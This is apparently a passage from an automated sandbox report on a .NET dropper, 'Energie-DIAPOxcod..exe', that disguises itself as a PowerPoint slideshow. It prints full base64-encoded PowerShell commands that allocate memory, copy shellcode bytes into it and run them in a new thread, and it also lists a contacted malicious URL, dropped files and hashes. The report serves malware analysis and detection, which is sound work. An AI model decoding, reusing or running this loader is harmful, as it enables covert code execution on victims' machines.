A1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A" (Show Process), Spawned process "powershell.exe" with commandline "-ec JABLAEMAawBzACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQASwBDAGsAcwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGEALAAwAHgAOABhACwAMAB4AGYAYwAsADAAeAA1ADkALAAwAHgAYgAzACwAMAB4ADUAOAAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAA5AGUALAAwAHgAMQBlACwAMAB4AGEAYwAsADAAeAA0AGYALAAwAHgANwA2ACwAMAB4ADUAYwAsADAAeAA0AGYALAAwAHgAYgAwACwAMAB4ADgANgAsADAAeAAwADEALAAwAHgAZAA5ACwAMAB4ADUANQAsADAAeABiADcALAAwAHgAMAAxACwAMAB4AGIAZAAsADAAeAAxAGUALAAwAHgAZQA3ACwAMAB4AGIAMQAsADAAeABiADUALAAwAHgANwAzACwAMAB4ADAAYgAsADAAeAAzADkALAAwAHgAOQBiACwAMAB4ADYANwAsADAAeAA5ADgALAAwAHgANABmACwAMAB4ADMANAAsADAAeAA4ADcALAAwAHgAMgA5ACwAMAB4AGUANQAsADAAeAA2ADIALAAwAHgAYQA2ACwAMAB4AGEAYQAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAyADgALAAwAHgAYQA1ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAMQAxACwAMAB4ADYANgAsADAAeABkAGUALAAwAHgANAA4ACwAMAB4ADUANgAsADAAeAA5AGIALAAwAHgAMQAzACwAMAB4ADEAOAAsADAAeAAwAGYALAAwAHgAZAA3ACwAMAB4ADgANgAsADAAeAA4AGQALAAwAHgAMgA0ACwAMAB4AGEAZAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADcANgAsADAAeAAyADMALAAwAHgAMQBiACwAMAB4AGQAYQAsADAAeABjAGUALAAwAHgANAAyACwAMAB4ADAAYQAsADAAeAA0AGQALAAwAHgANAA1ACwAMAB4ADEAZAAsADAAeAA4AGMALAAwAHgANgBmACwAMAB4ADgAYQAsADAAeAAxADUALAAwAHgAOAA1ACwAMAB4ADcANwAsADAAeABjAGYALAAwAHgAMQAwACwAMAB4ADUAZgAsADAAeAAwADMALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeAA1AGUALAAwAHgAYwA1ACwAMAB4ADcAMgAsADAAeAAwAGYALAAwAHgAYwBjACwAMAB4ADIAOAAsADAAeABiAGIALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA2AGMALAAwAHgANwBiACwAMAB4ADEAZAAsADAAeAA3AGIALAAwAHgAOAA0ACwAMAB4ADcAOAAsADAAeABhADAALAAwAHgANwBjACwAMAB4ADUAMwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4ADAAOAAsADAAeAA0ADAALAAwAHgAYQAzACwAMAB4AGYANQAsADAAeABhAGEALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeABkADkALAAwAHgAMgBkACwAMAB4ADIANgAsADAAeAA1ADgALAAwAHgAOQA2ACwAMAB4ADMAYQAsADAAeAA2ADAALAAwAHgANwBjACwAMAB4ADIAOQAsADAAeABlAGUALAAwAHgAMQBhACwAMAB4ADcAOAAsADAAeABhADIALAAwAHgAMQAxACwAMAB4AGMAZAAsADAAeAAwADkALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABjADkALAAwAHgANQAyACwAMAB4AGEAMgAsADAAeAA1ADQALAAwAHgANAA4ACwAMAB4ADMAZQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4ADgAYQAsADAAeABlADEALAAwAHgAZgBhACwAMAB4AGMAYwAsADAAeABjADAALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAA3AGMALAAwAHgAOABiACwAMAB4ADQANwAsADAAeABjADMALAAwAHgANABjACwAMAB4ADMANAAsADAAeAA5ADcALAAwAHgANABiACwAMAB4AGMANgAsADAAeAA0ADcALAAwAHgAYQA1ACwAMAB4AGQANAAsADAAeAA3AGMALAAwAHgAYwAwACwAMAB4ADgANQAsADAAeAA5AGQALAAwAHgANQBhACwAMAB4ADEANwAsADAAeABlAGEALAAwAHgAYgA3ACwAMAB4ADEAYgAsADAAeAA4ADcALAAwAHgAMQA1ACwAMAB4ADMAOAAsADAAeAA1AGMALAAwAHgAOAAxACwAMAB4AGQAMQAsADAAeAA2AGMALAAwAHgAMABjACwAMAB4AGIAOQAsADAAeABmADAALAAwAHgAMABjACwAMAB4AGMANwAsADAAeAAzADkALAAwAHgAZgBkACwAMAB4AGQAOAAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADYAOQAsADAAeABiADgALAAwAHgAMgAyACwAMAB4AGQAYgAsADAAeAA1ADgALAAwAHgANQA2ACwAMAB4ADIAMQAsADAAeABlADQALAAwAHgAOABiACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAMAAyACwAMAB4AGYAYgAsADAAeAA1ADIALAAwAHgAZgBmACwAMAB4ADkAYQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4AGIAZgAsADAAeAA0AGEALAAwAHgANQAzACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAYgA0ACwAMAB4ADQAMwAsADAAeAA3ADIALAAwAHgAOQBhACwAMAB4AGQAZAAsADAAeABlADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADUALAAwAHgAOAA1ACwAMAB4ADAANAAsADAAeABkAGUALAAwAHgANABkACwAMAB4ADMANAAsADAAeABjADgALAAwAHgAZgA0ACwAMAB4ADIAYgAsADAAeAA3ADYALAAwAHgANAAyACwAMAB4AGYAYgAsADAAeABjAGMALAAwAHgAMwA4ACwAMAB4AGEAMwAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4AGEAYwAsADAAeAA0ADMALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeAA3AGEALAAwAHgANQBiACwAMAB4AGYAYgAsADAAeABhADgALAAwAHgAOAAyACwAMAB4AGMAOQAsADAAeAAwADAALAAwAHgANwBiACwAMAB4AGQANQAsADAAeAA2ADUALAAwAHgAMABiACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMgBhACwAMAB4AGYANAAsADAAeAA4ADkALAAwAHgAMgBhACwAMAB4AGUAMwAsADAAeAA2ADAALAAwAHgANwAyACwAMAB4ADQANAAsADAAeAAwAGMALAAwAHgANgA1ACwAMAB4ADcAMgAsADAAeAA5ADQALAAwAHgANQBhACwAMAB4AGUAZgAsADAAeAA3ADIALAAwAHgAZgBjACwAMAB4ADMAYQAsADAAeAA0AGIALAAwAHgAMgAxACwAMAB4ADEAOQAsADAAeAA0ADUALAAwAHgANAA2ACwAMAB4ADUANQAsADAAeABiADIALAAwAHgAZAAwACwAMAB4ADYAOQAsADAAeAAwAGMALAAwAHgANgA3ACwAMAB4ADcAMgAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeABiADQALAAwAHgAOABkACwAMAB4ADQAZAAsADAAeABiADUALAAwAHgANAA0ACwAMAB4AGYAMQAsADAAeAA5AGIALAAwAHgAZgAzACwAMAB4ADMAMgAsADAAeAAxAGIALAAwAHgAMQA4ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABxAHIASQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAcQByAEkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHEAcgBJACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==" (Show Process), Spawned process "csc.exe" with commandline "/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline"" (Show Process), Spawned process "cvtres.exe" with commandline "/NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"energies.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Mon Nov 20 22:39:57 2017 mtime=Mon Nov 20 22:39:57 2017 atime=Mon Nov 20 22:39:57 2017 length=2051584 window=hide"
"6ljpalv5.dll" has type "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows"
"0XP.exe" has type "PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows"
"local.bat" has type "ASCII text with very long lines with CRLF line terminators"
"energies.ppt" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 5.1 Code page: 1252 Title: Gabarit formation STI2D Author: GRANJON David Last Saved By: ENAULT Revision Number: 453 Name of Creating Application: Microsoft Office PowerPoint Total Editing Time: 3d+07:31:43 Last Printed: Wed Feb 15 10:56:10 2012 Create Time/Date: Tue Sep 14 06:05:30 2010 Last Saved Time/Date: Mon Mar 26 10:55:04 2012 Number of Words: 2411"
"565950BA.wmf" has type "ms-windows metafont .wmf"
"RESA6DE.tmp" has type "80386 COFF executable not stripped - version 25189"
"index.dat" has type "data"
"6ljpalv5.out" has type "UTF-8 Unicode (with BOM) text with very long lines with CRLF line terminators"
"DADD3573.wmf" has type "ms-windows metafont .wmf"
"6ljpalv5.pdb" has type "MSVC program database ver \002"
"K4R3057IRAU7L1AL6CBG.temp" has type "data"
"ZXDHRFEVKQIGKVFQV7CC.temp" has type "data"
"GB9R5TCIOUEB9XX9HLKX.temp" has type "data"
"CSCA6C9.tmp" has type "MSVC .res"
"6ljpalv5.0.cs" has type "UTF-8 Unicode (with BOM) text with very long lines"
"565AB65D.wmf" has type "ms-windows metafont .wmf"
"6ljpalv5.cmdline" has type "UTF-8 Unicode (with BOM) text with very long lines with no line terminators" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"<Input Sample>" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config"
"<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch"
"<Input Sample>" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"<Input Sample>" touched file "C:\Windows\assembly\NativeImages_v2.0.50727_32\index248.dat"
"<Input Sample>" touched file "C:\Windows\System32\l_intl.nls"
"<Input Sample>" touched file "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp"
"<Input Sample>" touched file "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp"
"<Input Sample>" touched file "C:\Windows\assembly\pubpol47.dat" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
- Pattern match: "http://sevenxi.xyz/sharp/r3set/page.php"
- source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Unusual Characteristics
-
Matched Compiler/Packer signature
- details
-
"7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe.bin" was detected as "Microsoft visual C# v7.0 / Basic .NET"
"6ljpalv5.dll" was detected as "Microsoft visual C# v7.0 / Basic .NET"
"0XP.exe" was detected as "Microsoft visual C# v7.0 / Basic .NET" - source
- Static Parser
- relevance
- 10/10
-
Matched Compiler/Packer signature
File Details
Energie-DIAPOxcod..exe
- Filename
- Energie-DIAPOxcod..exe
- Size
- 4MiB (4194304 bytes)
- Type
- peexe assembly executable
- Description
- PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
- Architecture
- WINDOWS
- SHA256
- 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e
- MD5
- 31040ca5beb00de6174a92525623c865
- SHA1
- d3c5fa78c27ac42b7f5034b0aff9b75ba5520696
- ssdeep
- 49152:IoWJ7PRBCcJC4ZoeREKZadxv5GDLljdftUZH:YfeZH
- imphash
- f34d5f2d4577ed6d9ceec516c1f5a744
- authentihash
- 68f7f338780102d2ffde03171828fdb8f4bf92ba8b70a3107a43f7e04061ce5b
- Compiler/Packer
- Microsoft visual C# v7.0 / Basic .NET
- PDB Pathway
Version Info
- Translation
- 0x0000 0x04b0
- LegalCopyright
- -
- Assembly Version
- 0.0.0.0
- InternalName
- Energie-DIAPO.exe
- FileVersion
- 0.0.0.0
- ProductVersion
- 0.0.0.0
- FileDescription
- -
- OriginalFilename
- Energie-DIAPO.exe
Classification (TrID)
- 49.0% (.EXE) Generic CIL Executable (.NET, Mono, etc.)
- 20.9% (.EXE) Win32 Executable MS Visual C++ (generic)
- 18.5% (.EXE) Win64 Executable (generic)
- 4.4% (.DLL) Win32 Dynamic Link Library (generic)
- 3.0% (.EXE) Win32 Executable (generic)
File Sections
Details | ||||||
---|---|---|---|---|---|---|
File Resources
Details | ||||
---|---|---|---|---|
File Imports
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 10 processes in total (System Resource Monitor).
-
Input Sample
(PID: 3500)
- 0XP.exe (PID: 2288)
-
cmd.exe
"cmd /c ""%TEMP%\local.bat" "
(PID: 2280)
- mode.com mode con:cols=20 lines=1 (PID: 3512)
-
powershell.exe
"powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() 'JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgA